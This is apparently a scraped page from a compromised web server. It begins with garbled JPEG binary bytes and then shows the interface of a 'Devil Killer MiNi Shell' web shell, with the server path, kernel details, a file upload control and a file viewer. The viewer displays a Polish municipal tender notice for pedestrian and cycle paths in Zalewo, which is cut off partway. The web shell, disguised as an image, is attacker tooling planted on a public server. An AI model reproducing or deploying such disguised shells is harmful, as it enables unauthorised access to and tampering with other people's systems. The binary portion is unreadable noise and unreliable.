JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240321/0025446001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa zintegrowanej sieci ścieżek pieszo – rowerowych w Zalewie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ZALEWO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510743634</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Częstochowska 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zalewo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">14-230</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">897588377</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">897588272</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@zalewo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.zalewo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa zintegrowanej sieci ścieżek pieszo – rowerowych w Zalewie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5b3c8498-e5c3-11ee-9c02-ce2b643d361d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00254460</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00048857/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa zintegrowanej sieci ścieżek pieszo-rowerowych w Zalewie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zalewo.logintrade.net/zapytania_email,158820,0451e7b613982eac0e948c7e64bea5b5.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zalewo.logintrade.net/zapytania_email,158820,0451e7b613982eac0e948c7e64bea5b5.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Zasady ogólne:<br/>1) Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej:<br/>a) za pośrednictwem Platformy przetargowej Gminy Zalewo - https://zalewo.logintrade.net/zapytania_email,158820,0451e7b613982eac0e948c7e64bea5b5.html Korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>b) w przypadku przerwy w działaniu Platformy Przetargowej Zamawiający dopuszcza możliwość przesyłania korespondencji przy użyciu poczty elektronicznej: przetargi@zalewo.pl (nie dotyczy składania ofert).<br/>2) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, bezpłatnie rejestruje się lub w przypadku posiadania konto na Platformie przetargowej Gminy Zalewo loguje do platformy. Ma wówczas dostęp do możliwości: złożenia, zmiany, wycofania oferty, a także funkcjonalności pozwalających na składanie wniosków o wyjaśnienie treści SWZ oraz komunikację z Zamawiającym w pozostałych obszarach.<br/>2. Wymagania techniczne i organizacyjne umożliwiające użycie środków komunikacji elektronicznej:<br/>1) wymagania techniczne umożliwiające obsługę systemu Platformy przetargowej - dostęp do Internetu, - obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax, włączona obsługa JavaScript, zalecana szybkość łącza internetowego powyżej 500KB/s, zainstalowany Acrobat Reader, zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy,<br/>2) system dostępny jest za pośrednictwem następujących przeglądarek internetowych: Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11, Google Chrome 31, Mozilla Firefox 26, - Microsoft Edge, Opera 18.<br/>3) zalecany maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy nie powinien przekraczać 150 MB.<br/>4) Wykonawca zamierzający złożyć ofertę zobowiązany jest zapoznać się ze szczegółowymi wymaganiami technicznymi i organizacyjnymi wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu, które zostały opisane w Instrukcjach korzystania z Platformy przetargowej Gminy Zalewo<br/>dostępnych pod adresem: https://zalewo.logintrade.net/rejestracja/ustawowe.html<br/>5) jeżeli na ofertę składa się kilka dokumentów, Zamawiający rekomenduje podpisywanie ich w sposób jednolity, tzn. ten sam rodzaj podpisu powinien być składany na wszystkich dokumentach, najlepiej w takim formacie jak podpisany został pierwszy dokument, <br/>6) zalecenia Zamawiającego odnośnie użycia kwalifikowanego podpisu elektronicznego:<br/>a) dla dokumentów w formacie „pdf” zaleca się podpis formatem: PAdES,<br/>b) dla dokumentów w formacie innym niż „pdf” zaleca się podpis formatem: XAdES,<br/>c) Zamawiający zaleca stosowanie podpisu wewnętrznego, który polega na tym, że jest zapisany łącznie z podpisywanym<br/>dokumentem (tworzą jeden plik), a nie oddzielnie (plik podpisywany i plik podpisu),<br/>7) Informacje na temat kodowania i czasu odbioru danych:<br/>- oferta złożona przez wykonawcę na platformie nie jest widoczna dla zamawiającego, ponieważ widnieje w platformie jako zaszyfrowana. Możliwość otwarcia oferty dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert, - czas zapisywany jest w formacie YYYY-MM-DD HH:MM;SS. Czas przekazania danych jest to czas, w<br/>którym zostanie potwierdzone złożenie oferty, dokumentu przez wykonawcę. W przypadku wybrania opcji złożenia oferty bez logowania, potwierdzenie odbywa się poprzez klikniecie w link dostępny w wiadomości mailowej, wysłanej automatycznie po złożeniu oferty, dokumentu będąc <br/>niezalogowanym na Platformie. Wiadomość otrzymuje wykonawca na adres e-mail wskazany w formularzu w ikonę: „Złóż ofertę”. W przypadku wykonawców zalogowanych na platformie czas przekazania danych jest to czas wysłania dokumentu, oferty przez platformę.<br/>3. Szczegółowe wymagania techniczne i organizacyjne dotyczące komunikacji elektronicznej znajdują się w rozdziale VIII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Burmistrz Zalewa, ul. Częstochowska 8, 14-230 Zalewie, tel. 89 758 83 77;<br/>2. Z inspektorem Ochrony Danych Osobowych można się kontaktować poprzez: e-mail: iodo@zalewo.pl adres do korespondencji:<br/>Urząd Miejski w Zalewie, ul. Częstochowska 8, 14-230 Zalewo, tel. 89 758 83 773. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego;<br/>4. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 r. –Prawo zamówień publicznych (tekst jednolity: Dz. U. z 2022 r. poz. 1710 ze zm.), dalej „ustawa Pzp”;<br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>8. posiada Pani/Pan:<br/>-na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>-na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych*;<br/>-na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9. nie przysługuje Pani/Panu:<br/>-w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>-prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>______________________<br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RL.271.1.2.2024.AG</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest budowa zintegrowanej sieci ścieżek pieszo-rowerowych w miejscowości Zalewo. <br/><br/>Zamierzenie obejmuje swoim zakresem:<br/>1) Budowę fragmentu ciągu pieszo – rowerowego wraz z kładką nad rzeką Trumpiną,<br/>2)	Budowę ścieżki pieszo – rowerowej w ciągu ulic Tartacznej, Kolejowej, 29 Stycznia i Żeromskiego w Zalewie od km 13+579 do km 14+806,9 DW 519.<br/><br/>1)	Budowa fragmentu ciągu pieszo – rowerowego wraz z kładką nad rzeką Trumpiną<br/>Zakres robót obejmuje wykonanie:<br/>a)	kładki pieszo-rowerowej stanowiącej kontynuację projektowanych ciągów komunikacyjnych przez rzekę Trumpinę. Kładka o długości 10,5m, szerokości 4m. Przyczółki żelbetowe o gr. ścian czołowych i bocznych 25cm. Ściany boczne o dług. 100cm poza lico ściany czołowej. Belka podłożyskowa o wymiarach 120x90cm. Posadowienie przyczółków za pomocą rur Ø508/12,5mm i dług. L=7,35m. Pale wypełnione betonem 2m od góry, wraz ze zbrojeniem pala. Pozostała część jako korek gruntowy i zasyp piaskiem z cementem 1:4 (w przypadku braku wypełnienia gruntem do rzędnych wykonania korka betonowego. Przyjęto po 3 pale / 1 przyczółek. Konstrukcja nośna kładki w postaci nośnych profili głównych jako belki stalowe HEB500 i poprzecznic z ceowników C200. Do dolnych półek dźwigarów przyspawać od spodu płyty górne łożysk stalowych. Na profilach nośnych zaprojektowano poprzeczne bale drewniane 20x30cm w rozstawie osiowym co ok. 0,5m. Na nich należy wykonać dylinę dolną w postaci pełnego pokładu podłużnego z krawędziaków 20x10cm (z zachowaniem szczeliny miedzy krawędziakami o szer. 1cm), mocowanych do bali poprzecznych. Na krawędziakach należy wykonać styczną dylinę górną w postaci pokładu z desek o gr. 5cm. Balustrady obustronne drewniane o wysokości 1,1m. Drewno na elementy kładki – dębina klasy D24. Teren przed przyczółkami od strony wody należy umocnić w postaci okładziny z płyt Meba o gr. 10cm, wykonanych na materacu z pospółki o gr. 30cm zawiniętym w geowłókninę filtracyjną. Otwory w płytach wypełnić humusem z obsiewem trawą.<br/><br/>b)	ciągu pieszego i ścieżki rowerowej. W I etapie zrealizowany zostanie odcinek od ist. bulwaru przy jez. Ewingi do proj. kładki z odnogami do DW nr 519 o łącznej długości 238,50 mb. Ciągi komunikacyjne zaprojektowano w formie zintegrowanych ciągów pieszo jezdnych tj. ciąg pieszy o szer. 2m z równoległą ścieżką rowerową o szer. 1,5m (całkowita szerokość ciągu chodnik i ścieżka rowerowa wynosi 3,5m). Nawierzchnia wydzielona opornikami betonowymi, z zachowaniem spadków nawierzchni. Ciąg z lokalnymi zawężeniami w przypadku wystąpienia kolizji z istniejącym zadrzewieniem terenu (do 3,0 m wg cz. graficznej opracowania). Odprowadzenie wód opadowych grawitacyjnie do gruntu. W sąsiedztwie ciągu przewidziano montaż elementów małej architektury w postaci 6 szt. ławek pojedynczych, 2 szt. zestawów śmietników, jednego stojaka na rowery oraz 2 szt. tablic edukacyjnych (T5 i T7). <br/>W obrębie kładki tj. przy ciągu pieszym oraz na murkach oporowych przy najeździe na mostek zaprojektowane zostały balustrady z prętów stalowych z pochwytem drewnianym. Liny stalowe osadzone zostaną w systemowych terminalach z gwintem wewnętrznym ze stali nierdzewnej. Szczegóły dot. sposobu kotwienia zależą od przyjętego systemu (zgodnie ze wskazaniem producenta). Zamawiający nie określa siły naciągu lin (balustrada ma spełniać swoją funkcję pod względem estetycznym, funkcjonalnym i bezpieczeństwa).<br/><br/>Szczegółowe parametry techniczne:<br/>- długość kładki: 10,50 mb,<br/>- szerokość kładki: 4,00 mb,<br/>- powierzchnia kładki: 42,00 m2.<br/>- powierzchnia ciągów pieszych (z płyt betonowych szlachetnych płukanych 60x20cm) gr. 6 cm – 572,99 m2<br/>- powierzchnia ciągów rowerowych (o nawierzchni z mieszanek mineralno-bitumicznych) – 556,00 m2<br/>- balustrady z prętów stalowych z pochwytem drewnianym – 108,50 m2<br/>- wysokość ścian oporowych zróżnicowana w zależności od wysokości nasypu (Hmax=2,3m). <br/>a)	długość ścianki o wys. 2,3 m - 50 m. <br/>b)	długość ścianki o wys. 1,0 m - 30,5m.<br/><br/>2)	Budowa ścieżki pieszo – rowerowej w ciągu ulic Tartacznej, Kolejowej, 29 Stycznia i Żeromskiego w Zalewie od km 13+579 do km 14+806,9 DW 519.<br/><br/>Zakres robót obejmuje: budowę ścieżki pieszo – rowerowej o długości 1 265 mb (odcinek od km 0+847,7 do km 2+112,5 projektu), przebudowę istniejących zjazdów indywidualnych i publicznych oraz budowę kanalizacji deszczowej w km 1+520 do 1+611. Nawierzchnia ciągu pieszo ‐ rowerowego wykonana będzie z mieszanki mineralno ‐ asfaltowej AC8S (50/70) grubości 3 cm ułożonej na warstwie wiążącej z mieszanki mineralno‐asfaltowej AC11W (35/50) gr. 4 cm. Warstwy bitumiczne zostaną ułożone na podbudowie zasadniczej z kruszywa 0/31,5 mm łamanego C50/30 stabilizowanego mechanicznie o gr. 15 cm ułożonej na warstwie gruntu stabilizowanego cementem CBGM C1,5/2 o gr. 15 cm. W zależności od usytuowania w stosunku do krawędzi jezdni drogi wojewódzkiej ciąg pieszo‐rowerowy będzie ograniczony obustronnie obrzeżem betonowym 8x30 cm, a w przypadku usytuowania przy krawędzi jezdni zostanie ograniczony krawężnikiem betonowym drogowym 15x30 cm na ławie betonowej z oporem. Ścieżka za obrzeżami będzie ograniczona trawnikiem. Obrzeża i krawężniki betonowe będą ustawiony na ławie betonowej z oporem z betonu klasy C12/15. Połączenie krawężnika i nawierzchni jezdni należy zabezpieczyć bitumiczną masą zlewową. Istniejące zjazdy do posesji zaprojektowano o nawierzchni bitumicznej na podbudowie z kruszywa 0/31,5 mm łamanego C50/30 stabilizowanego mechanicznie gr. 20 cm na warstwie gruntu stabilizowanego cementem CBGM C1,5/2 o gr. 15 cm. Krawężniki betonowe najazdowe 15x22 cm na zjazdach ustawione na wysokość +3 cm od istniejącej nawierzchni bitumicznej jezdni. Zmianę wysokości krawężnika na zjazdach wykonać krawężnikiem skośnym 30/22x15 cm. Zjazdy zaprojektowano z mieszanki mineralno‐asfaltowej AC8S gr. 3 cm. <br/>Szczegółowe parametry techniczne:<br/>- długość: 1 264,80 m<br/>- szerokość: 3,00–3,50 m<br/><br/>2. Wykonawca zobowiązany jest do uwzględnienia w kosztach inwestycji niezbędnych prac przygotowawczych (tj. obsługi geodezyjnej oraz wprowadzenia niezbędnego oznakowania robót ze względu na bezpieczeństwo ruchu drogowego) i porządkowych (w tym uprzątnięcia terenu budowy, wywozu pozostałości powstałych w trakcie realizacji zadania, a także utylizacji odpadów). Materiały rozbiórkowe nadające się do ponownego wykorzystania zostaną przekazane w miejsce wskazane przez Zamawiającego).<br/><br/>3.	Szczegółowy zakres robót określony został w dokumentacji projektowej: projektach budowlano - wykonawczych, projektach organizacji ruchu, specyfikacjach technicznych wykonania i odbioru robót budowlanych oraz w przedmiarach robót budowlanych. Dokumentacja ta stanowi zał. nr 8 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233260-9 - Roboty budowlane w zakresie dróg pieszych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45232130-2 - Roboty budowlane w zakresie rurociągów do odprowadzania wody burzowej</p> <p class="mb-0">45242000-5 - Budowa infrastruktury wypoczynkowej na terenach nadwodnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Badania i oceny ofert dokona Komisja Przetargowa.<br/>2. Wybór oferty dokonany zostanie na podstawie kryteriów cena oraz okres gwarancji.<br/>3. Oferta, która przedstawia najkorzystniejszy bilans ( suma punktów przyznanych w oparciu o ustalone powyżej kryteria cena +gwarancja ) zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Wynik będzie traktowany jako wartość punktowa oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - 